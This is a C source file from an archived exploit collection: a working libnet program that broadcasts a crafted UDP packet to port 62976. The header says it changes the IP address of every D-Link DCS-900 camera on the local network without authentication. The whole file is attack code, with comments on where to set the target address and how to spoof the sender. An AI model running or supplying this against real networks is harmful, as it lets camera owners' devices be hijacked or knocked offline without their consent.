home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / dlink / dLinkNetCamIPAddressSetExploit.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  3KB  |  83 lines

---

1. /*
2.   dlinkdown.c - miscname.com
3.  
4.   change ip address on all dlink dcs-900 cameras on the local network without authentication
5.  
6.   dlink dcs-900 ip cameras use a broadcast/listen method of configuration ...
7.   rather than a static ip addr out of the box, it listens for a 62976/udp broadcast packet
8.   telling it what ip addr to set itself too
9.  
10.   http://www.dlink.com.au/Default.aspx?ArticleID=109
11.  
12.   rtfs and mod the ip address to set all listening cameras too (default is 10.0.50.50)
13. */
14.  
15. #include <libnet.h>
16. #include <stdio.h>
17. #include <stdlib.h>
18.  
19. int main (int argc, char *argv[]) {
20.  
21.         libnet_t *p;
22.         libnet_ptag_t ip, udp, ipoptions, ether;
23.         u_long srcip, dstip;
24.         u_short srcport = 62976, dstport = 62976, x;
25.         signed int ret;
26.         char errbuff[LIBNET_ERRBUF_SIZE], ipopt[21];
27.         int len;
28.         int8_t *macdst = "ff:ff:ff:ff:ff:ff";
29.         u_int8_t *macdest;
30.         char payload[128] =     "\xfd\xfd\x00\x04\x00\x03\x00\x0f\x3d\x56\x97\x07"
31.                                 "\x0a\x00\x32\x32" /* ip address to set too */
32.                                 "\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00";
33.         u_short payloadlen = strlen(payload);
34.  
35.         srcip = libnet_get_ipaddr4(p); /* mod to spoof */
36.         dstip = libnet_name2addr4(p,"255.255.255.255",LIBNET_DONT_RESOLVE); /* 255.255.255.255 */
37.         udp = ip = ether = ipoptions = 0;
38.  
39.         if ( (macdest = libnet_hex_aton(macdst,&len)) == NULL) {
40.                 fprintf(stderr,"cant get mac str - %s",libnet_geterror(p));
41.                 exit (1);
42.         }
43.  
44.         if ( (p = libnet_init (LIBNET_LINK, NULL, errbuff)) == NULL) {
45.                 fprintf(stderr,"cant init() - %s\n",errbuff);
46.                 exit (1);
47.         }
48.  
49.         if ( (udp = libnet_build_udp(srcport,dstport,LIBNET_UDP_H + payloadlen,0,payload,payloadlen,p,udp)) == -1) {
50.                 fprintf(stderr,"cant build udp - %s\n",libnet_geterror(p));
51.                 exit (1);
52.         }
53.  
54.         for (x=0;x<20;x++) {
55.                 ipopt[x] = libnet_get_prand(LIBNET_PR2);
56.         }
57.  
58.         ipoptions = libnet_build_ipv4_options (ipopt,20,p,ipoptions);
59.  
60.         if ( (ip = libnet_build_ipv4 (LIBNET_IPV4_H + 20 + payloadlen +
61. LIBNET_UDP_H,0,250,0,128,IPPROTO_UDP,0,srcip,dstip,payload,payloadlen,p,ip)) == -1) {
62.                 fprintf(stderr,"cant build ipv4 - %s\n",libnet_geterror(p));
63.                 exit (1);
64.         }
65.  
66.         if ((ether = libnet_build_ethernet (macdest,macdest,ETHERTYPE_IP,NULL,0,p,ether)) == -1) {
67.                 fprintf(stderr,"cant build ether - %s",libnet_geterror(p));
68.                 exit (1);
69.         }
70.  
71.         //libnet_diag_dump_pblock(p);
72.  
73.         if ( (ret = libnet_write(p)) == -1) {
74.                 fprintf(stderr,"%s\n",libnet_geterror(p));
75.         }
76.  
77.         free(macdest); /* hex_aton malloc's - see libnet doco */
78.         libnet_destroy(p);
79.  
80.         return 0;
81. }
82.  
83.